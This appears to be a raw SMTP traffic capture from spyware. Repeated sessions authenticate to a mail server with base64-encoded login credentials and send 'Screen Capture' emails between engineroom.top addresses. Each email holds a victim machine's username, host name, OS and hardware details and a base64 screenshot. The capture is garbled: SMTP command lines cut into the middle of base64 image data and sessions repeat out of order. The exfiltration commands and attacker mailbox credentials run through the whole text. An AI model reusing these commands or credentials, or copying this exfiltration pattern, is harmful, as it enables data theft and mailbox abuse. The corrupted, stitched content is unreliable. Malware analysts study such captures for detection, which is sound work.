Nzs0Pid\r\n/wAjBb/9eq/+htXHVd1TVb3V7hZ7+bzZVTYG2heMk44A9TVKqICiiigAro9K1GK4e1sVRxK5\r\nSJScYJOAK5ypLaeS1uYriFtssTh0bGcEHINRKClua0qsqbvE9Dk0LUo+tsWHqrA/1rc8P2tx\r\nFp7pJAqt5zHEykcYXpXnv/Cb+If+f8f9+Y//AImj/hN/EP8Az/j/AL8x/wDxNRGiou6NZ4qU\r\nEHLO Host\r\nAUTH login ZnJhbmtsb2dzQGVuZ2luZXJvb20udG9w\r\nAUTH login ZnJhbmtsb2dzQGVuZ2luZXJvb20udG9w\r\nNTY2MjIwNWFjZUFDRQ==\r\nMAIL FROM:<franklogs@engineroom.top>\r\nRCPT TO:<frankjoe@engineroom.top>\r\nDATA\r\nMIME-Version: 1.0\r\nFrom: franklogs@engineroom.top\r\nTo: frankjoe@engineroom.top\r\nDate: 27 Jun 2019 04:41:19 -0700\r\nSubject: user/Host Screen Capture\r\nContent-Type: multipart/mixed; boundary=--boundary_2_0bc52fd3-c7a6-4085-bb12-7a53393e7461\r\n\r\n\r\n----boundary_2_0bc52fd3-c7a6-4085-bb12-7a53393e7461\r\nContent-Type: text/html; charset=us-ascii\r\nContent-Transfer-Encoding: quoted-printable\r\n\r\nTime: 06/27/2019 04:25:09<br>UserName: user<br>ComputerName: Host<br>OSFullName:=\r\n Win32NT<br>CPU: Unknown<br>RAM: 4095.55 MB<br>IP: 0.0.0.0=0A<hr>\r\n----boundary_2_0bc52fd3-c7a6-4085-bb12-7a53393e7461\r\nContent-Type: application/octet-stream; name=Cg4aBy416f.jpeg\r\nContent-Transfer-Encoding: base64\r\n\r\n/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9\r\nPDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhC\r\nY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wAAR\r\nCAPCB4ADASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAA\r\nAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkK\r\nFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWG\r\nh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl\r\n5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREA\r\nAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYk\r\nNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOE\r\nhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk\r\n5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwDz+iiigAorX8OabBqd1JFKcuq7kQttDeuT\r\nXU/8I5JAv7vRLdx679/8zTSE2ef0V3E2myovz6NBGPXyQP51Qayh34aK3U+h2CnyhzHLUV15\r\n0GxktJZpxHbqqlvMST29OhrkKkYUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUV0Hg2wi1DVh\r\nHMOAR/Ik/wAqUnZXNKcOeVr2/wCBqc/RXtH/AAj+mf8APt/5Eb/Gj+wNM/59v/Ijf41N5dvx\r\n/wCAXy0f5n9y/wDkjxeivZJ/DemzQsiwmMnuGJ/Q5rzTxDoM+kXTAqTF1BHp/hRzNOzB0otX\r\npu9vK36sxqKKKswCiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooo\r\noAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAC\r\niiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooo\r\noAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAC\r\niiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooo\r\noAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAC\r\niiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooo\r\noAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAC\r\niiigAooooA1vDE3la5b56PlfzFb2p3EkNyNkrp/usRXJ6fL5F/by5xtkB/Wu1v5reAhZlXdI\r\n3GQOR61pTV3YiehlNezuMNPIw9C5NSWb7pGye1Ub0xxTkRsCDzgdqfYzKpdmYBQOSaqWjsSt\r\ndR2sv+4kJPOMVzlaurStJHvOVVjhVPXHqayqyZogooopDCvQvh9Z6dLoNzPf21q+252+ZPGp\r\nwNq4GT7n9a89rtvDoB+H2qAgEfaRwTj/AJ50m7K5UFzSSJrzWLRL+aO00fSmgQlVL2o3ZHrz\r\nVdtbTDEaNo4GQATa+2T3qnp8IkvEBYLz3YNx6H2rQ1jS7aGGNoJSAOobnt14+lcMsRaai3ue\r\nnyUotRcTa0690G/aGGPSbYzupL4tFCqR61rw6TpkiknTLLg9rdf8K4HSp72C9VbC5jEknyjP\r\nP6EV6ALgSSrArgTBAWA4BPfFdMZ9zjxFJQl7pWfTNNMU3/EtshhGIIgX/CvHa9sa4hmgnWI5\r\nZUIPGO1eJ1pFpq6dzms1owoooqgCur+Hn/IbH+f4WrlK6v4ef8hsf5/haont935m9D436S/J\r\nnqFZd9dXEOowJHJhGeNdm0fMGLZOevGBWk7rGhZ2CqOSScAVhXNxJeams9lC862w2xsoG0sf\r\nvZJ9uKU3ZFYaHNJtrS3U36x/FFvHNo8jyKCYyCD9SAR+tOk1ryiu+BVO8I0ZkxIvvtxz+Bp/\r\niL/kCXH/AAH/ANCFEpKUXYqjTnTrQcurR4vRRRWhyBRRRQAUUUUAFFFFABRRRQAUUUUAFFFF\r\nABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAU\r\nUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFF\r\nABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAU\r\nUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFF\r\nABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAU\r\nUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFF\r\nABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAU\r\nUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAKDgg+lddrRS7021m81UcBflJH8WBXIV6H4Zg\r\ntrvSrOUxRPIgILSAHoSOM1SdhNXOfltlhtWiYA4B+ZRyff61T09BJKfMB+XHyn1r03yUTlY0\r\nU4xlVANVJrZfKkMoWQHsy1dSopWsrWJjFrc841p8yovoM1m1o6+oj1aWNRgJgY9OM1nVkWFF\r\nFFABXc+F0kl8B6mkMfmSNcgBcZ/uVw1elfDZ9nh+6YjOLk/+grSew4vlaZhREwExyBty5354\r\nPHp6U+eT5HKFt4ZsAt0UelbV94du7y6vL1XUvLJ8instR6noBW0iezDvKrZkyfzrjlRs+Y9S\r\nOIpO19zKs9Pml2XcRWIhshvX3xW8bwR3TOzjcwUA/Xg/yNQJb/ZrcQoWIHNcdfC6N7IJFcyF\r\nvfp2xXHBPEN62SJrTtra56NaOGjmKngxN+NeRV6d4fjlispVnJ8zymyD1rzGu7Bq1K3mcVf4\r\nwooorrMQrq/h5/yGx/n+Fq5Sur+Hn/IbH+f4WqJ7fd+ZvQ+N+kvyZ6Lf2bXYi2TeWY23DKbh\r\n0x09altreO1gWKMHaO56k9yfeotWR5NIvUjVmdoHCqoySdp4Fc7NpckDwGe0MiOkpWK3RmWJ\r\niqBcHHykkE54qrK9zNzk48vQ6sopYMVBYdCR0rO8Rf8AIEuP+A/+hCqmgWFzDd3FxeRx+bkK\r\nZGjPmMdiZIbONuc9utW/EX/IEuP+A/8AoQqZ/CzTD/xoeq/M8XoooqzAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiitObRJYbRphc28jrCk7wqW3qj\r\nYweVAP3h0JoAzK3NB8RyaQhhkgW4tyc7ScFT7GsOigDu7nxrpsttiG2uYZsdQFxn65rAPiKQ\r\nS+YPMlYdPNbj8qwxycVPfWkljezWspUyRMVYqeCR6UAMnmkuZ5JpW3SSMWY+5qOrtjppvLea\r\ndrqC2ihZVZpt/JbOMbVPoaivLN7OWSGZ086ORo3jGcjHfOMYP1oAr0UUUAFdL4a8WDQbCW1N\r\niLgSS+ZuMu3HAGMbT6VzVFAHeD4kADA0gAe1x/8AY0w/ERCMHR1x/wBd/wD7CuGopNJgdsfH\r\n0B/5gcf/AH+H/wARTP8AhOrXcW/sGHce/mjP/oFcZRS5I9h8z7nanx8nlsiaQqZUrxP0/wDH\r\na4qiimklohXuFFFWrKya881vNjhihXfJLJnaoyAOgJPJA4FMCrWjomqvpN556Z+oHI/zk1Jb\r\n6E9wisl7aDzJjBECX/esADxhcDO4dcfhUC6VcNLYx7ow16dseSflO8p83HqPek1fQqE3B8yO\r\nsHxElx/x7qf+Af8A2VH/AAsSX/n2T/vg/wDxVcvHol1LeRW0bRF5YjKrZO3AyMdOuQR9cU22\r\n0ozwwSSXlvbm4JESSCQs2Dj+FT3pKPmautb7K+46r/hYkv8Az7J/3wf/AIqqeqeN5b+0aDyg\r\nuecBcAn35NYZ0S48/wAqOWGUi4NuzIxwrDucjpgE59jUVxpxtrVZpbqAM43RxfNvdc4DD5cA\r\nHryQfalyprcaruLukk/QpUVbvtOnsI7Z5yv+kx+Yqg8gZxz71UqznCiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigArobvVbW6tTaGRERbWHbIse0s6KN0b\r\nEDJBPTOQCBXPUUAdfea5ZTX0Dia2NsrsYdqTGS2JQhSVbKgKcHCegwKqWVyJmuRqF81/HbBb\r\ntZsuwLLxsy4BwcgdOwrm6kFxMLc24mkEBbcY9x2lvXHTNAGvPqJudJQR6iYH+c3Nud4Nw5bO\r\n7Kgg8ED5iMba1W12zzf/AGae2Rpbl3JuFmCzRkAAfJ1xzwwxz9a4+ihgbehXsVvYXkTXVtby\r\nySRMhuIDKpC7s8bW55FXoNZ0+KfzIZWjUXNzIodWYgPEFUnrnLe5965aih6gjS1a+F/b2DyT\r\nNNdJCUmd8lid7EZJ68EVm0UUAFFFFAElukclxGk0vlRswDybd20Z5OB1xXUR3kdno2n+ZfAQ\r\nG2nVrbY2bjLuF7Yxn1PHauTpzSyOiI7syoMICchRnPHpzQ9VYDoZ9ahmtpbV7hntvsEKJEQd\r\nvmrszxjrw3P61Y1e6FzoV9LHffaLd7qIQR7GUQjDHZyABgY4GR+dcpVi6vry8CC7up5wn3RL\r\nIW2/TPSh6gtCvRRRQAVe0mUw3Dst7FanZg+dGXSQd1YANn8RjiqNFAHWwappcSlba4gggS8a\r\nUxvAzOyFVB8s7SVJIbHzKRxzVO0vNPJ0y4e6EP8AZ7sTAyMWcBy67SARznHJFc9RQHkb1vrM\r\nUOlB1Yi/jmwigHHllxJ1/wB5cfjUkuoacuvLcW8n+i2UJNsCh+d+WAx2+djyfSudooA2tJvr\r\nSzt5Fnkd2viYpypYeVH6+5yc9+AR3q/LrFoLQLLdfa4FgiiFltdQXQqC+SMAEKeevOCK5aig\r\nDe1W90/VVssSS27KkrSs58zaxZmC8Kuck9RwM+1ZcsFokDNHeeZIBGQnlEZJB3DP+ycD3zVW\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACirX9nXf/PL\r\n/wAeH+NH9nXf/PL/AMeH+NTzx7m/1at/I/uZVoq1/Z13/wA8v/Hh/jR/Z13/AM8v/Hh/jRzx\r\n7h9WrfyP7mVaKtf2fdf88v8Ax4f41FNbywbfNXbu6cg0KUXsyZUakVeUWl6EVFFFUZBRRRQA\r\nUUuCexo2n0NACUUu0+hpKACiiigAooooAKKKOtABRS7T6GjafQ0AJRRgjqKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAOmzS7qjzRmv\r\nOsfY8xMI5WiaVY3Ma8M4U4H1NMzW3pIV9InlJ+S3jmDj3ZVC/rn8qwN1U42MoVuZtdh+azNY\r\nOfJ/4F/Sr+aztWOfK/H+lXSXvo5sdK9CXy/NGfRRRXYfOBRRUkFvLcybIULtjOPahuw0m3ZH\r\npvwy/wCRdn/6+m/9BSuskkSJC8jBVHUk1xHgvUItE0aS3vEk81py4VADwVUevsa0ZtWt9TvY\r\nITFMEZwgG8ADJxnoc1HtI9zVYeo1exv/AG+JoPNhPmLu2nqOcZrlfEfhVNbs21CwQJfBnJXo\r\nJhuPB/2vQ/gfbV01ozpzRtNFG3mlsO4HGBVyEHLO Host\r\nAUTH login ZnJhbmtsb2dzQGVuZ2luZXJvb20udG9w\r\nNTY2MjIwNWFjZUFDRQ==\r\nMAIL FROM:<franklogs@engineroom.top>\r\nRCPT TO:<frankjoe@engineroom.top>\r\nEHLO Host\r\nAUTH login ZnJhbmtsb2dzQGVuZ2luZXJvb20udG9w\r\nNTY2MjIwNWFjZUFDRQ==\r\nNTY2MjIwNWFjZUFDRQ==\r\nMAIL FROM:<franklogs@engineroom.top>\r\nRCPT TO:<frankjoe@engineroom.top>\r\nDATA\r\nMIME-Version: 1.0\r\nFrom: franklogs@engineroom.top\r\nTo: frankjoe@engineroom.top\r\nDate: 27 Jun 2019 05:13:18 -0700\r\nSubject: user/Host Screen Capture\r\nContent-Type: multipart/mixed; boundary=--boundary_3_d131ab63-4ecd-463a-b523-8a85f891fb43\r\n\r\n\r\n----boundary_3_d131ab63-4ecd-463a-b523-8a85f891fb43\r\nContent-Type: text/html; charset=us-ascii\r\nContent-Transfer-Encoding: quoted-printable\r\n\r\nTime: 06/27/2019 05:06:32<br>UserName: user<br>ComputerName: Host<br>OSFullName:=\r\n Microsoft Windows 7 Enterprise N <br>CPU: Intel(R) Core(TM)CPU E5-2670=\r\n 0 @ 2.60GHz<br>RAM: 4095.55 MB<br>IP: 0.0.0.0=0A<hr>\r\n----boundary_3_d131ab63-4ecd-463a-b523-8a85f891fb43\r\nContent-Type: application/octet-stream; name=Ygs24DS509.jpeg\r\nContent-Transfer-Encoding: base64\r\n\r\n/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDABALDA4MChAODQ4SERATGCgaGBYWGDEjJR0oOjM9\r\nPDkzODdASFxOQERXRTc4UG1RV19iZ2hnPk1xeXBkeFxlZ2P/2wBDARESEhgVGC8aGi9jQjhC\r\nY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2NjY2P/wAAR\r\nCAPCB4ADASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAA\r\nAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkK\r\nFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWG\r\nh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl\r\n5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREA\r\nAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYk\r\nNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOE\r\nhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk\r\n5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwDz+iiigAorX8OabBqd1JFKcuq7kQttDeuT\r\nXU/8I5JAv7vRLdx679/8zTSE2ef0V3E2myovz6NBGPXyQP51Qayh34aK3U+h2CnyhzHLUV15\r\n0GxktJZpxHbqqlvMST29OhrkKkYUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUV0Hg2wi1DVh\r\nHMOAR/Ik/wAqUnZXNKcOeVr2/wCBqc/RXtH/AAj+mf8APt/5Eb/Gj+wNM/59v/Ijf41N5dvx\r\n/wCAXy0f5n9y/wDkjxeivZJ/DemzQsiwmMnuGJ/Q5rzTxDoM+kXTAqTF1BHp/hRzNOzB0otX\r\npu9vK36sxqKKKswCiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooo\r\noAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAC\r\niiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooo\r\noAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAC\r\niiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooo\r\noAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAC\r\niiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooo\r\noAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKAC\r\niiigAooooA1vDE3la5b56PlfzFb2p3EkNyNkrp/usRXJ6fL5F/by5xtkB/Wu1v5reAhZlXdI\r\n3GQOR61pTV3YiehlNezuMNPIw9C5NSWb7pGye1Ub0xxTkRsCDzgdqfYzKpdmYBQOSaqWjsSt\r\ndR2sv+4kJPOMVzlaurStJHvOVVjhVPXHqayqyZogooopDCvQvh9Z6dLoNzPf21q+252+ZPGp\r\nwNq4GT7n9a89rtvDoB+H2qAgEfaRwTj/AJ50m7K5UFzSSJrzWLRL+aO00fSmgQlVL2o3ZHrz\r\nVdtbTDEaNo4GQATa+2T3qnp8IkvEBYLz3YNx6H2rQ1jS7aGGNoJSAOobnt14+lcMsRaai3ue\r\nnyUotRcTa0690G/aGGPSbYzupL4tFCqR61rw6TpkiknTLLg9rdf8K4HSp72C9VbC5jEknyjP\r\nP6EV6ALgSSrArgTBAWA4BPfFdMZ9zjxFJQl7pWfTNNMU3/EtshhGIIgX/CvHa9sa4hmgnWI5\r\nZUIPGO1eJ1pFpq6dzms1owoooqgCur+Hn/IbH+f4WrlK6v4ef8hsf5/haont935m9D436S/J\r\nnqFZd9dXEOowJHJhGeNdm0fMGLZOevGBWk7rGhZ2CqOSScAVhXNxJeams9lC862w2xsoG0sf\r\nvZJ9uKU3ZFYaHNJtrS3U36x/FFvHNo8jyKCYyCD9SAR+tOk1ryiu+BVO8I0ZkxIvvtxz+Bp/\r\niL/kCXH/AAH/ANCFEpKUXYqjTnTrQcurR4vRRRWhyBRRRQAUUUUAFFFFABRRRQAUUUUAFFFF\r\nABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAU\r\nUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFF\r\nABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAU\r\nUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFF\r\nABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAU\r\nUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFF\r\nABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAU\r\nUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAKDgg+lddrRS7021m81UcBflJH8WBXIV6H4Zg\r\ntrvSrOUxRPIgILSAHoSOM1SdhNXOfltlhtWiYA4B+ZRyff61T09BJKfMB+XHyn1r03yUTlY0\r\nU4xlVANVJrZfKkMoWQHsy1dSopWsrWJjFrc841p8yovoM1m1o6+oj1aWNRgJgY9OM1nVkWFF\r\nFFABXc+F0kl8B6mkMfmSNcgBcZ/uVw1elfDZ9nh+6YjOLk/+grSew4vlaZhREwExyBty5354\r\nPHp6U+eT5HKFt4ZsAt0UelbV94du7y6vL1XUvLJ8instR6noBW0iezDvKrZkyfzrjlRs+Y9S\r\nOIpO19zKs9Pml2XcRWIhshvX3xW8bwR3TOzjcwUA/Xg/yNQJb/ZrcQoWIHNcdfC6N7IJFcyF\r\nvfp2xXHBPEN62SJrTtra56NaOGjmKngxN+NeRV6d4fjlispVnJ8zymyD1rzGu7Bq1K3mcVf4\r\nwooorrMQrq/h5/yGx/n+Fq5Sur+Hn/IbH+f4WqJ7fd+ZvQ+N+kvyZ6Lf2bXYi2TeWY23DKbh\r\n0x09altreO1gWKMHaO56k9yfeotWR5NIvUjVmdoHCqoySdp4Fc7NpckDwGe0MiOkpWK3RmWJ\r\niqBcHHykkE54qrK9zNzk48vQ6sopYMVBYdCR0rO8Rf8AIEuP+A/+hCqmgWFzDd3FxeRx+bkK\r\nZGjPmMdiZIbONuc9utW/EX/IEuP+A/8AoQqZ/CzTD/xoeq/M8XoooqzAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiitObRJYbRphc28jrCk7wqW3qj\r\nYweVAP3h0JoAzK3NB8RyaQhhkgW4tyc7ScFT7GsOigDu7nxrpsttiG2uYZsdQFxn65rAPiKQ\r\nS+YPMlYdPNbj8qwxycVPfWkljezWspUyRMVYqeCR6UAMnmkuZ5JpW3SSMWY+5qOrtjppvLea\r\ndrqC2ihZVZpt/JbOMbVPoaivLN7OWSGZ086ORo3jGcjHfOMYP1oAr0UUUAFdL4a8WDQbCW1N\r\niLgSS+ZuMu3HAGMbT6VzVFAHeD4kADA0gAe1x/8AY0w/ERCMHR1x/wBd/wD7CuGopNJgdsfH\r\n0B/5gcf/AH+H/wARTP8AhOrXcW/sGHce/mjP/oFcZRS5I9h8z7nanx8nlsiaQqZUrxP0/wDH\r\na4qiimklohXuFFFWrKya881vNjhihXfJLJnaoyAOgJPJA4FMCrWjomqvpN556Z+oHI/zk1Jb\r\n6E9wisl7aDzJjBECX/esADxhcDO4dcfhUC6VcNLYx7ow16dseSflO8p83HqPek1fQqE3B8yO\r\nsHxElx/x7qf+Af8A2VH/AAsSX/n2T/vg/wDxVcvHol1LeRW0bRF5YjKrZO3AyMdOuQR9cU22\r\n0ozwwSSXlvbm4JESSCQs2Dj+FT3pKPmautb7K+46r/hYkv8Az7J/3wf/AIqqeqeN5b+0aDyg\r\nuecBcAn35NYZ0S48/wAqOWGUi4NuzIxwrDucjpgE59jUVxpxtrVZpbqAM43RxfNvdc4DD5cA\r\nHryQfalyprcaruLukk/QpUVbvtOnsI7Z5yv+kx+Yqg8gZxz71UqznCiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooA\r\nKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACii\r\nigAooooAKKKKACiiigAooooAKKKKACiiigAooooAKKKKACiii